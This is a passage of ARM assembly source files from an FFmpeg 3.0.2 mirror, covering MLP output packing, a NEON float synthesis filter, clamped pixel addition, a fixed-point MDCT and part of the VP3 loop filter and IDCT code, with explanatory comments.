DAT0 .req v1
DAT1 .req v2
DAT2 .req v3
DAT3 .req v4
DAT4 .req v5
DAT5 .req v6
DAT6 .req sl // use these rather than the otherwise unused
DAT7 .req fp // ip and lr so that we can load them usinf LDRD
.macro output4words tail, head, r0, r1, r2, r3, r4, r5, r6, r7, pointer_dead=0
.if \head
.set SIZE_GROUP1, IDX1
.if SIZE_GROUP1 > 4
.set SIZE_GROUP1, 4
.endif
.set SIZE_GROUP2, 4 - SIZE_GROUP1
load_group1 SIZE_GROUP1, \channels, \r0, \r1, \r2, \r3, \pointer_dead
.endif
.if \tail
eor CHECK, CHECK, \r4, lsr #8 - (\channels - IDX2)
eor CHECK, CHECK, \r5, lsr #7 - (\channels - IDX2)
decr_modulo IDX2, 2, \channels
.endif
.if \head
load_group2 SIZE_GROUP2, \channels, \r0, \r1, \r2, \r3, \pointer_dead
.endif
.if \tail
eor CHECK, CHECK, \r6, lsr #8 - (\channels - IDX2)
eor CHECK, CHECK, \r7, lsr #7 - (\channels - IDX2)
decr_modulo IDX2, 2, \channels
stm OUT!, {\r4, \r5, \r6, \r7}
.endif
.if \head
lsl \r0, #8 + \shift
lsl \r1, #8 + \shift
lsl \r2, #8 + \shift
lsl \r3, #8 + \shift
.endif
.endm
.set WORDS_PER_LOOP, \channels // calculate LCM (channels, 8)
.if (WORDS_PER_LOOP % 2) == 0
.set WORDS_PER_LOOP, WORDS_PER_LOOP / 2
.endif
.if (WORDS_PER_LOOP % 2) == 0
.set WORDS_PER_LOOP, WORDS_PER_LOOP / 2
.endif
.if (WORDS_PER_LOOP % 2) == 0
.set WORDS_PER_LOOP, WORDS_PER_LOOP / 2
.endif
.set WORDS_PER_LOOP, WORDS_PER_LOOP * 8
.set SAMPLES_PER_LOOP, WORDS_PER_LOOP / \channels
function ff_mlp_pack_output_inorder_\channels\()ch_\shift\()shift_armv6, export=1
.if SAMPLES_PER_LOOP > 1
tst COUNT, #SAMPLES_PER_LOOP - 1 // always seems to be in practice
it ne
bne X(ff_mlp_pack_output) // but just in case, branch to C implementation if not
.endif
subs COUNT, COUNT, #SAMPLES_PER_LOOP
it lo
bxlo lr
push {v1-v6,sl,fp,lr}
.set IDX1, \channels
.set IDX2, \channels
output4words 0, 1, DAT0, DAT1, DAT2, DAT3, DAT4, DAT5, DAT6, DAT7
0: beq 1f
.rept WORDS_PER_LOOP / 8
output4words 1, 1, DAT4, DAT5, DAT6, DAT7, DAT0, DAT1, DAT2, DAT3
output4words 1, 1, DAT0, DAT1, DAT2, DAT3, DAT4, DAT5, DAT6, DAT7
.endr
subs COUNT, COUNT, #SAMPLES_PER_LOOP
bne 0b
1:
.rept WORDS_PER_LOOP / 8 - 1
output4words 1, 1, DAT4, DAT5, DAT6, DAT7, DAT0, DAT1, DAT2, DAT3
output4words 1, 1, DAT0, DAT1, DAT2, DAT3, DAT4, DAT5, DAT6, DAT7
.endr
output4words 1, 1, DAT4, DAT5, DAT6, DAT7, DAT0, DAT1, DAT2, DAT3, pointer_dead=1
output4words 1, 0, DAT0, DAT1, DAT2, DAT3, DAT4, DAT5, DAT6, DAT7
pop {v1-v6,sl,fp,pc}
endfunc
.purgem output4words
.unreq CHECK
.unreq COUNT
.unreq IN
.unreq OUT
.unreq DAT0
.unreq DAT1
.unreq DAT2
.unreq DAT3
.unreq DAT4
.unreq DAT5
.unreq DAT6
.unreq DAT7
.endif // mixed
.else // not inorder
.ifc \shift, mixed
// This case not currently handled
.else // not mixed
#if !CONFIG_THUMB
CHECK .req a1
COUNT .req a2
IN .req a3
OUT .req a4
DAT0 .req v1
DAT1 .req v2
DAT2 .req v3
DAT3 .req v4
CHAN0 .req v5
CHAN1 .req v6
CHAN2 .req sl
CHAN3 .req fp
CHAN4 .req ip
CHAN5 .req lr
.macro output4words
.if \channels == 8
.if IDX1 == 8
uxtb CHAN0, CHAN4, ror #0
uxtb CHAN1, CHAN4, ror #8
uxtb CHAN2, CHAN4, ror #16
uxtb CHAN3, CHAN4, ror #24
.else
uxtb CHAN0, CHAN5, ror #0
uxtb CHAN1, CHAN5, ror #8
uxtb CHAN2, CHAN5, ror #16
uxtb CHAN3, CHAN5, ror #24
.endif
ldr DAT0, [IN, CHAN0, lsl #2]
ldr DAT1, [IN, CHAN1, lsl #2]
ldr DAT2, [IN, CHAN2, lsl #2]
ldr DAT3, [IN, CHAN3, lsl #2]
.if IDX1 == 4
add IN, IN, #8*4
.endif
decr_modulo IDX1, 4, \channels
.else
.set SIZE_GROUP1, IDX1
.if SIZE_GROUP1 > 4
.set SIZE_GROUP1, 4
.endif
.set SIZE_GROUP2, 4 - SIZE_GROUP1
.if SIZE_GROUP1 == 2
loadregoffsh2 DAT, 0, IN, CHAN, 0 + (\channels - IDX1)
loadregoffsh2 DAT, 1, IN, CHAN, 1 + (\channels - IDX1)
add IN, IN, #8*4
.else // SIZE_GROUP1 == 4
loadregoffsh2 DAT, 0, IN, CHAN, 0 + (\channels - IDX1)
loadregoffsh2 DAT, 1, IN, CHAN, 1 + (\channels - IDX1)
loadregoffsh2 DAT, 2, IN, CHAN, 2 + (\channels - IDX1)
loadregoffsh2 DAT, 3, IN, CHAN, 3 + (\channels - IDX1)
.if IDX1 == 4
add IN, IN, #8*4
.endif
.endif
decr_modulo IDX1, SIZE_GROUP1, \channels
.if SIZE_GROUP2 == 2
loadregoffsh2 DAT, 2, IN, CHAN, 0 + (\channels - IDX1)
loadregoffsh2 DAT, 3, IN, CHAN, 1 + (\channels - IDX1)
.if IDX1 == 2
add IN, IN, #8*4
.endif
.endif
decr_modulo IDX1, SIZE_GROUP2, \channels
.endif
.if \channels == 8 // in this case we can corrupt CHAN0-3
rsb CHAN0, CHAN0, #8
rsb CHAN1, CHAN1, #8
rsb CHAN2, CHAN2, #8
rsb CHAN3, CHAN3, #8
lsl DAT0, #8 + \shift
lsl DAT1, #8 + \shift
lsl DAT2, #8 + \shift
lsl DAT3, #8 + \shift
eor CHECK, CHECK, DAT0, lsr CHAN0
eor CHECK, CHECK, DAT1, lsr CHAN1
eor CHECK, CHECK, DAT2, lsr CHAN2
eor CHECK, CHECK, DAT3, lsr CHAN3
.else
.if \shift != 0
lsl DAT0, #\shift
lsl DAT1, #\shift
lsl DAT2, #\shift
lsl DAT3, #\shift
.endif
bic DAT0, DAT0, #0xff000000
bic DAT1, DAT1, #0xff000000
bic DAT2, DAT2, #0xff000000
bic DAT3, DAT3, #0xff000000
eorlslreg CHECK, DAT0, CHAN, 0 + (\channels - IDX2)
eorlslreg CHECK, DAT1, CHAN, 1 + (\channels - IDX2)
decr_modulo IDX2, 2, \channels
eorlslreg CHECK, DAT2, CHAN, 0 + (\channels - IDX2)
eorlslreg CHECK, DAT3, CHAN, 1 + (\channels - IDX2)
decr_modulo IDX2, 2, \channels
lsl DAT0, #8
lsl DAT1, #8
lsl DAT2, #8
lsl DAT3, #8
.endif
stm OUT!, {DAT0 - DAT3}
.endm
.set WORDS_PER_LOOP, \channels // calculate LCM (channels, 4)
.if (WORDS_PER_LOOP % 2) == 0
.set WORDS_PER_LOOP, WORDS_PER_LOOP / 2
.endif
.if (WORDS_PER_LOOP % 2) == 0
.set WORDS_PER_LOOP, WORDS_PER_LOOP / 2
.endif
.set WORDS_PER_LOOP, WORDS_PER_LOOP * 4
.set SAMPLES_PER_LOOP, WORDS_PER_LOOP / \channels
function ff_mlp_pack_output_outoforder_\channels\()ch_\shift\()shift_armv6, export=1
.if SAMPLES_PER_LOOP > 1
tst COUNT, #SAMPLES_PER_LOOP - 1 // always seems to be in practice
it ne
bne X(ff_mlp_pack_output) // but just in case, branch to C implementation if not
.endif
teq COUNT, #0
it eq
bxeq lr
push {v1-v6,sl,fp,lr}
ldr CHAN0, [sp, #(9+0)*4] // get ch_assign from stack
ldr CHAN4, [CHAN0]
.if \channels == 2
uxtb CHAN0, CHAN4, ror #0
uxtb CHAN1, CHAN4, ror #8
.else
ldr CHAN5, [CHAN0, #4]
.if \channels == 6
uxtb CHAN0, CHAN4, ror #0
uxtb CHAN1, CHAN4, ror #8
uxtb CHAN2, CHAN4, ror #16
uxtb CHAN3, CHAN4, ror #24
uxtb CHAN4, CHAN5, ror #0
uxtb CHAN5, CHAN5, ror #8
.endif
.endif
.set IDX1, \channels
.set IDX2, \channels
0:
.rept WORDS_PER_LOOP / 4
output4words
.endr
subs COUNT, COUNT, #SAMPLES_PER_LOOP
bne 0b
pop {v1-v6,sl,fp,pc}
.ltorg
endfunc
.purgem output4words
.unreq CHECK
.unreq COUNT
.unreq IN
.unreq OUT
.unreq DAT0
.unreq DAT1
.unreq DAT2
.unreq DAT3
.unreq CHAN0
.unreq CHAN1
.unreq CHAN2
.unreq CHAN3
.unreq CHAN4
.unreq CHAN5
#endif // !CONFIG_THUMB
.endif // mixed
.endif // inorder
.endm // implement_pack
.macro pack_channels inorder, channels
implement_pack \inorder, \channels, 0
implement_pack \inorder, \channels, 1
implement_pack \inorder, \channels, 2
implement_pack \inorder, \channels, 3
implement_pack \inorder, \channels, 4
implement_pack \inorder, \channels, 5
implement_pack \inorder, \channels, mixed
.endm
.macro pack_order inorder
pack_channels \inorder, 2
pack_channels \inorder, 6
pack_channels \inorder, 8
.endm
pack_order 0
pack_order 1
|
Akagi201/ffmpeg-xcode
| 4,287
|
ffmpeg-3.0.2/libavcodec/arm/synth_filter_neon.S
|
/*
* Copyright (c) 2010 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
@ Float synthesis filter (NEON).  Runs ff_imdct_half_neon on the input,
@ then sweeps a windowed FIR over the 512-sample ring buffer synth_buf,
@ producing 32 output floats per call (4 outer passes x 8 samples).
@ r0 = FFT/MDCT context (consumed by ff_imdct_half_neon)
@ r1 = synth_buf base, r2 = &synth_buf_offset (updated mod 512)
@ r3 = 4th argument, restored after the call (synth_buf2 -- TODO confirm
@ against the C prototype); remaining args (window/out/in/scale) on stack.
function ff_synth_filter_float_neon, export=1
push {r3-r11,lr}
ldr r4, [r2] @ synth_buf_offset
add r1, r1, r4, lsl #2 @ synth_buf
sub r12, r4, #32
bfc r12, #9, #23 @ new offset = (offset - 32) & 511
bic r4, r4, #63 @ r4 = offset rounded down to a multiple of 64
str r12, [r2] @ store updated synth_buf_offset
ldr r2, [sp, #12*4] @ in
mov r9, r1 @ synth_buf
VFP vpush {d0} @ keep scale (d0) alive across the call
bl X(ff_imdct_half_neon)
VFP vpop {d0}
pop {r3} @ restore saved 4th argument
ldr r5, [sp, #9*4] @ window
ldr r2, [sp, #10*4] @ out
NOVFP vldr s0, [sp, #12*4] @ scale
add r8, r9, #12*4
mov lr, #64*4 @ byte stride between successive filter taps
mov r1, #4 @ outer loop count: 4 x 8 = 32 output samples
1:
add r10, r9, #16*4 @ synth_buf
add r11, r8, #16*4
add r0, r5, #16*4 @ window
add r6, r5, #32*4
add r7, r5, #48*4
vld1.32 {q10}, [r3,:128] @ a
add r3, r3, #16*4
vld1.32 {q1}, [r3,:128] @ b
vmov.f32 q2, #0.0 @ c
vmov.f32 q3, #0.0 @ d
mov r12, #512 @ samples left to walk in the ring buffer
2:
vld1.32 {q9}, [r8, :128], lr
vrev64.32 q9, q9
vld1.32 {q8}, [r5, :128], lr
vmls.f32 d20, d16, d19
vld1.32 {q11}, [r0, :128], lr
vmls.f32 d21, d17, d18
vld1.32 {q12}, [r9, :128], lr
vmla.f32 d2, d22, d24
vld1.32 {q8}, [r6, :128], lr
vmla.f32 d3, d23, d25
vld1.32 {q9}, [r10,:128], lr
vmla.f32 d4, d16, d18
vld1.32 {q12}, [r11,:128], lr
vmla.f32 d5, d17, d19
vrev64.32 q12, q12
vld1.32 {q11}, [r7, :128], lr
vmla.f32 d6, d22, d25
vmla.f32 d7, d23, d24
subs r12, r12, #64 @ 64 ring-buffer samples consumed per pass
beq 3f
cmp r12, r4 @ reached the 64-aligned offset? then wrap
bne 2b
sub r8, r8, #512*4 @ wrap all four synth_buf pointers
sub r9, r9, #512*4
sub r10, r10, #512*4
sub r11, r11, #512*4
b 2b
3:
vmul.f32 q8, q10, d0[0] @ scale accumulators a and b
vmul.f32 q9, q1, d0[0]
vst1.32 {q3}, [r3,:128] @ write back accumulators d and c
sub r3, r3, #16*4
vst1.32 {q2}, [r3,:128]
vst1.32 {q8}, [r2,:128] @ 8 output samples (two 16-float-apart stores)
add r2, r2, #16*4
vst1.32 {q9}, [r2,:128]
subs r1, r1, #1
it eq
popeq {r4-r11,pc} @ done after 4 passes
cmp r4, #0
itt eq
subeq r8, r8, #512*4 @ offset 0: pre-wrap pointers for the next pass
subeq r9, r9, #512*4
sub r5, r5, #512*4 @ rewind window to its start
sub r2, r2, #12*4 @ out
add r3, r3, #4*4 @ synth_buf2
add r5, r5, #4*4 @ window
add r9, r9, #4*4 @ synth_buf
sub r8, r8, #4*4 @ synth_buf
b 1b
endfunc
|
Akagi201/ffmpeg-xcode
| 4,428
|
ffmpeg-3.0.2/libavcodec/arm/idctdsp_arm.S
|
@
@ ARMv4-optimized IDCT functions
@ Copyright (c) 2004 AGAWA Koji <i (AT) atty (DOT) jp>
@
@ This file is part of FFmpeg.
@
@ FFmpeg is free software; you can redistribute it and/or
@ modify it under the terms of the GNU Lesser General Public
@ License as published by the Free Software Foundation; either
@ version 2.1 of the License, or (at your option) any later version.
@
@ FFmpeg is distributed in the hope that it will be useful,
@ but WITHOUT ANY WARRANTY; without even the implied warranty of
@ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
@ Lesser General Public License for more details.
@
@ You should have received a copy of the GNU Lesser General Public
@ License along with FFmpeg; if not, write to the Free Software
@ Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
@
#include "config.h"
#include "libavutil/arm/asm.S"
@ void ff_add_pixels_clamped_arm(int16_t *block, uint8_t *dest, ptrdiff_t stride)
@ Adds the 8x8 int16 coefficient block to the 8x8 uint8 destination with
@ clamping to [0,255].  Processes one row (8 pixels, two 32-bit words) per
@ loop iteration; pixels are unpacked from/ repacked into words by masking.
@ Clamp trick: after the add, bit 8 set in the 9+-bit sum means over/underflow;
@ ~block >> 24 then yields 0x00 for a negative block value (underflow) and
@ 0xFF for a large positive one (overflow).
function ff_add_pixels_clamped_arm, export=1, align=5
push {r4-r10}
mov r10, #8 /* 8 rows */
1:
ldr r4, [r1] /* load dest */
/* block[0] and block[1]*/
ldrsh r5, [r0]
ldrsh r7, [r0, #2]
and r6, r4, #0xFF
and r8, r4, #0xFF00
add r6, r6, r5
add r8, r7, r8, lsr #8
mvn r5, r5 /* ~block, used to build the clamp value */
mvn r7, r7
tst r6, #0x100 /* out of byte range? */
it ne
movne r6, r5, lsr #24 /* 0x00 or 0xFF */
tst r8, #0x100
it ne
movne r8, r7, lsr #24
mov r9, r6
ldrsh r5, [r0, #4] /* moved from [A] */
orr r9, r9, r8, lsl #8
/* block[2] and block[3] */
/* [A] */
ldrsh r7, [r0, #6]
and r6, r4, #0xFF0000
and r8, r4, #0xFF000000
add r6, r5, r6, lsr #16
add r8, r7, r8, lsr #24
mvn r5, r5
mvn r7, r7
tst r6, #0x100
it ne
movne r6, r5, lsr #24
tst r8, #0x100
it ne
movne r8, r7, lsr #24
orr r9, r9, r6, lsl #16
ldr r4, [r1, #4] /* moved from [B] */
orr r9, r9, r8, lsl #24
/* store dest */
ldrsh r5, [r0, #8] /* moved from [C] */
str r9, [r1]
/* load dest */
/* [B] */
/* block[4] and block[5] */
/* [C] */
ldrsh r7, [r0, #10]
and r6, r4, #0xFF
and r8, r4, #0xFF00
add r6, r6, r5
add r8, r7, r8, lsr #8
mvn r5, r5
mvn r7, r7
tst r6, #0x100
it ne
movne r6, r5, lsr #24
tst r8, #0x100
it ne
movne r8, r7, lsr #24
mov r9, r6
ldrsh r5, [r0, #12] /* moved from [D] */
orr r9, r9, r8, lsl #8
/* block[6] and block[7] */
/* [D] */
ldrsh r7, [r0, #14]
and r6, r4, #0xFF0000
and r8, r4, #0xFF000000
add r6, r5, r6, lsr #16
add r8, r7, r8, lsr #24
mvn r5, r5
mvn r7, r7
tst r6, #0x100
it ne
movne r6, r5, lsr #24
tst r8, #0x100
it ne
movne r8, r7, lsr #24
orr r9, r9, r6, lsl #16
add r0, r0, #16 /* moved from [E]: advance to next block row */
orr r9, r9, r8, lsl #24
subs r10, r10, #1 /* moved from [F] */
/* store dest */
str r9, [r1, #4]
/* [E] */
/* [F] */
add r1, r1, r2 /* next dest row */
bne 1b
pop {r4-r10}
bx lr
endfunc
|
Akagi201/ffmpeg-xcode
| 7,209
|
ffmpeg-3.0.2/libavcodec/arm/mdct_fixed_neon.S
|
/*
* Copyright (c) 2011 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
@ Pre-rotation stage of the fixed-point MDCT.
@ \dst = FFT input buffer to scatter into, \rt = scratch for the tail
@ pointer into revtab.  Expects r2 = in, r4 = revtab, r6 = n (mdct size),
@ r7 = tcos.  Walks the input from both ends at once, forms the
@ pre-rotation sums (halving subtracts keep everything in 16 bits),
@ multiplies by the cos/sin twiddles and scatters each complex result
@ through the FFT bit-reversal permutation (revtab indices, 4 bytes each).
.macro prerot dst, rt
lsr r3, r6, #2 @ n4
add \rt, r4, r6, lsr #1 @ revtab + n4
add r9, r3, r3, lsl #1 @ n3
add r8, r7, r6 @ tcos + n4
add r3, r2, r6, lsr #1 @ in + n4
add r9, r2, r9, lsl #1 @ in + n3
sub r8, r8, #16
sub r10, r3, #16
sub r11, r9, #16
mov r12, #-16 @ backwards stride for the mirrored pointers
1:
vld2.16 {d0,d1}, [r9, :128]!
vld2.16 {d2,d3}, [r11,:128], r12
vld2.16 {d4,d5}, [r3, :128]!
vld2.16 {d6,d7}, [r10,:128], r12
vld2.16 {d16,d17},[r7, :128]! @ cos, sin
vld2.16 {d18,d19},[r8, :128], r12
vrev64.16 q1, q1
vrev64.16 q3, q3
vrev64.16 q9, q9
vneg.s16 d0, d0
vneg.s16 d2, d2
vneg.s16 d16, d16
vneg.s16 d18, d18
vhsub.s16 d0, d0, d3 @ re (halving sub avoids 16-bit overflow)
vhsub.s16 d4, d7, d4 @ im
vhsub.s16 d6, d6, d5
vhsub.s16 d2, d2, d1
vmull.s16 q10, d0, d16 @ complex multiply by the twiddles
vmlsl.s16 q10, d4, d17
vmull.s16 q11, d0, d17
vmlal.s16 q11, d4, d16
vmull.s16 q12, d6, d18
vmlsl.s16 q12, d2, d19
vmull.s16 q13, d6, d19
vmlal.s16 q13, d2, d18
vshrn.s32 d0, q10, #15 @ back to Q15
vshrn.s32 d1, q11, #15
vshrn.s32 d2, q12, #15
vshrn.s32 d3, q13, #15
vzip.16 d0, d1 @ interleave to (re,im) pairs
vzip.16 d2, d3
ldrh lr, [r4], #2 @ scatter via revtab (forward index)
ldrh r2, [\rt, #-2]! @ and mirrored index from the tail
add lr, \dst, lr, lsl #2
add r2, \dst, r2, lsl #2
vst1.32 {d0[0]}, [lr,:32]
vst1.32 {d2[0]}, [r2,:32]
ldrh lr, [r4], #2
ldrh r2, [\rt, #-2]!
add lr, \dst, lr, lsl #2
add r2, \dst, r2, lsl #2
vst1.32 {d0[1]}, [lr,:32]
vst1.32 {d2[1]}, [r2,:32]
ldrh lr, [r4], #2
ldrh r2, [\rt, #-2]!
add lr, \dst, lr, lsl #2
add r2, \dst, r2, lsl #2
vst1.32 {d1[0]}, [lr,:32]
vst1.32 {d3[0]}, [r2,:32]
ldrh lr, [r4], #2
ldrh r2, [\rt, #-2]!
add lr, \dst, lr, lsl #2
add r2, \dst, r2, lsl #2
vst1.32 {d1[1]}, [lr,:32]
vst1.32 {d3[1]}, [r2,:32]
subs r6, r6, #32
bgt 1b
.endm
@ Fixed-point forward MDCT: pre-rotation (prerot), FFT, then in-place
@ post-rotation of the FFT output with the same tcos twiddle table.
@ r0 = MDCT context, r1 = output buffer, r2 = input samples.
@ Struct offsets used: +8 revtab, +16 mdct_size, +24 tcos (see comments).
function ff_mdct_fixed_calc_neon, export=1
push {r1,r4-r11,lr} @ save output pointer for after the FFT
ldr r4, [r0, #8] @ revtab
ldr r6, [r0, #16] @ mdct_size; n
ldr r7, [r0, #24] @ tcos
prerot r1, r5 @ pre-rotate input into the output buffer
mov r4, r0
bl X(ff_fft_fixed_calc_neon)
pop {r5} @ r5 = output buffer (the FFT result)
mov r12, #-16
ldr r6, [r4, #16] @ mdct_size; n
ldr r7, [r4, #24] @ tcos
add r5, r5, r6, lsr #1 @ midpoint of the output
add r7, r7, r6, lsr #1 @ midpoint of tcos
sub r1, r5, #16
sub r2, r7, #16
1:
@ post-rotation: walk outwards from the middle in both directions
vld2.16 {d4,d5}, [r7,:128]! @ cos,sin (forward)
vld2.16 {d6,d7}, [r2,:128], r12 @ cos,sin (backward)
vld2.16 {d0,d1}, [r5,:128]
vld2.16 {d2,d3}, [r1,:128]
vrev64.16 q3, q3
vrev64.16 q1, q1
vneg.s16 q3, q3
vneg.s16 q2, q2
vmull.s16 q11, d2, d6
vmlal.s16 q11, d3, d7
vmull.s16 q8, d0, d5
vmlsl.s16 q8, d1, d4
vmull.s16 q9, d0, d4
vmlal.s16 q9, d1, d5
vmull.s16 q10, d2, d7
vmlsl.s16 q10, d3, d6
vshrn.s32 d0, q11, #15 @ narrow back to Q15
vshrn.s32 d1, q8, #15
vshrn.s32 d2, q9, #15
vshrn.s32 d3, q10, #15
vrev64.16 q0, q0
vst2.16 {d2,d3}, [r5,:128]! @ store in place over the FFT output
vst2.16 {d0,d1}, [r1,:128], r12
subs r6, r6, #32
bgt 1b
pop {r4-r11,pc}
endfunc
@ Like ff_mdct_fixed_calc_neon, but the pre-rotation/FFT run in the
@ context's tmp_buf and the post-rotation results are stored as full
@ 32-bit words (no vshrn narrowing) to the output -- the "w"(ide) variant.
@ r0 = MDCT context, r1 = 32-bit output buffer, r2 = input samples.
function ff_mdct_fixed_calcw_neon, export=1
push {r1,r4-r11,lr} @ save output pointer for after the FFT
ldrd r4, r5, [r0, #8] @ revtab, tmp_buf
ldr r6, [r0, #16] @ mdct_size; n
ldr r7, [r0, #24] @ tcos
prerot r5, r1 @ pre-rotate input into tmp_buf
mov r4, r0
mov r1, r5
bl X(ff_fft_fixed_calc_neon)
pop {r7} @ r7 = 32-bit output buffer
mov r12, #-16
ldr r6, [r4, #16] @ mdct_size; n
ldr r9, [r4, #24] @ tcos
add r5, r5, r6, lsr #1 @ midpoint of tmp_buf
add r7, r7, r6 @ midpoint of the 32-bit output
add r9, r9, r6, lsr #1 @ midpoint of tcos
sub r3, r5, #16
sub r1, r7, #16
sub r2, r9, #16
1:
@ post-rotation, reading 16-bit tmp_buf, writing 32-bit products
vld2.16 {d4,d5}, [r9,:128]! @ cos,sin (forward)
vld2.16 {d6,d7}, [r2,:128], r12 @ cos,sin (backward)
vld2.16 {d0,d1}, [r5,:128]!
vld2.16 {d2,d3}, [r3,:128], r12
vrev64.16 q3, q3
vrev64.16 q1, q1
vneg.s16 q3, q3
vneg.s16 q2, q2
vmull.s16 q8, d2, d6
vmlal.s16 q8, d3, d7
vmull.s16 q9, d0, d5
vmlsl.s16 q9, d1, d4
vmull.s16 q10, d0, d4
vmlal.s16 q10, d1, d5
vmull.s16 q11, d2, d7
vmlsl.s16 q11, d3, d6
vrev64.32 q8, q8
vrev64.32 q9, q9
vst2.32 {q10,q11},[r7,:128]! @ forward half, 32-bit results
vst2.32 {d16,d18},[r1,:128], r12 @ backward half
vst2.32 {d17,d19},[r1,:128], r12
subs r6, r6, #32
bgt 1b
pop {r4-r11,pc}
endfunc
|
Akagi201/ffmpeg-xcode
| 13,571
|
ffmpeg-3.0.2/libavcodec/arm/vp3dsp_neon.S
|
/*
* Copyright (c) 2009 David Conrad
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
@ 16-bit IDCT cosine table: C1..C7 (xC1S7..xC7S1 below index into it via d0/d1).
const vp3_idct_constants, align=4
.short 64277, 60547, 54491, 46341, 36410, 25080, 12785
endconst
#define xC1S7 d0[0]
#define xC2S6 d0[1]
#define xC3S5 d0[2]
#define xC4S4 d0[3]
#define xC5S3 d1[0]
#define xC6S2 d1[1]
#define xC7S1 d1[2]
@ VP3 in-loop deblocking filter over an edge.
@ In: d16..d19 = the four pixel lines p0 p1 p2 p3 straddling the edge,
@ r2 = filter limit.  Out: d0/d1 = filtered p1/p2, clamped to [0,255].
.macro vp3_loop_filter
vsubl.u8 q3, d18, d17 @ p2 - p1
vsubl.u8 q2, d16, d19 @ p0 - p3
vadd.i16 q1, q3, q3 @ 2*(p2 - p1)
vadd.i16 q2, q2, q3 @ (p0 - p3) + (p2 - p1)
vadd.i16 q0, q1, q2 @ f = (p0 - p3) + 3*(p2 - p1)
vrshr.s16 q0, q0, #3 @ f = (f + 4) >> 3 (rounding shift)
vmovl.u8 q9, d18
vdup.u16 q15, r2 @ filter limit
vabs.s16 q1, q0 @ |f|
vshr.s16 q0, q0, #15 @ sign mask of f
vqsub.u16 q2, q15, q1 @ soft-limit |f| against the threshold
vqsub.u16 q3, q2, q1 @ (saturating subs implement the VP3 ramp)
vsub.i16 q1, q2, q3 @ bounded |f|
veor q1, q1, q0
vsub.i16 q0, q1, q0 @ re-apply the sign
vaddw.u8 q2, q0, d17 @ p1 + f
vsub.i16 q3, q9, q0 @ p2 - f
vqmovun.s16 d0, q2 @ saturate to unsigned bytes
vqmovun.s16 d1, q3
.endm
@ Vertical (horizontal-edge) loop filter: filters the two rows either
@ side of the edge at r0.  r0 = first pixel below the edge, r1 = stride,
@ r2 = bounding-values table (limit byte loaded at offset 129*4).
function ff_vp3_v_loop_filter_neon, export=1
sub ip, r0, r1 @ ip -> row p1 (one above the edge pointer)
sub r0, r0, r1, lsl #1 @ r0 -> row p0 (two above)
vld1.64 {d16}, [r0,:64], r1 @ p0
vld1.64 {d17}, [r0,:64], r1 @ p1
vld1.64 {d18}, [r0,:64], r1 @ p2
vld1.64 {d19}, [r0,:64], r1 @ p3
ldrb r2, [r2, #129*4] @ filter limit
vp3_loop_filter
vst1.64 {d0}, [ip,:64], r1 @ store filtered p1/p2
vst1.64 {d1}, [ip,:64], r1
bx lr
endfunc
@ Horizontal (vertical-edge) loop filter: same filter as the vertical
@ version, but pixels are gathered column-wise, transposed into rows,
@ filtered, transposed back and scattered as 2-byte pairs.
@ r0 = first pixel right of the edge, r1 = stride, r2 = bounding values.
function ff_vp3_h_loop_filter_neon, export=1
sub ip, r0, #1 @ ip -> p1 column (store pointer)
sub r0, r0, #2 @ r0 -> p0 column
vld1.32 {d16[]}, [r0], r1 @ load 4 bytes per row, 8 rows total
vld1.32 {d17[]}, [r0], r1
vld1.32 {d18[]}, [r0], r1
vld1.32 {d19[]}, [r0], r1
vld1.32 {d16[1]}, [r0], r1
vld1.32 {d17[1]}, [r0], r1
vld1.32 {d18[1]}, [r0], r1
vld1.32 {d19[1]}, [r0], r1
ldrb r2, [r2, #129*4] @ filter limit
vtrn.8 d16, d17 @ 4x8 transpose: columns -> p0..p3 rows
vtrn.8 d18, d19
vtrn.16 d16, d18
vtrn.16 d17, d19
vp3_loop_filter
vtrn.8 d0, d1 @ back to per-row (p1,p2) byte pairs
vst1.16 {d0[0]}, [ip], r1
vst1.16 {d1[0]}, [ip], r1
vst1.16 {d0[1]}, [ip], r1
vst1.16 {d1[1]}, [ip], r1
vst1.16 {d0[2]}, [ip], r1
vst1.16 {d1[2]}, [ip], r1
vst1.16 {d0[3]}, [ip], r1
vst1.16 {d1[3]}, [ip], r1
bx lr
endfunc
@ Loads the 8x8 coefficient block from r2 into q8-q15 (zeroing the source
@ buffer as it goes), performs the first add/sub butterfly on rows 0/4,
@ then falls through into vp3_idct_core_neon, which computes one 1-D pass
@ of the VP3 IDCT.  Clobbers d8-d15, hence the vpush (callee-saved per
@ AAPCS).  r3 is preserved for the callers' bias value.
function vp3_idct_start_neon
vpush {d8-d15}
vmov.i16 q4, #0
vmov.i16 q5, #0
movrel r3, vp3_idct_constants
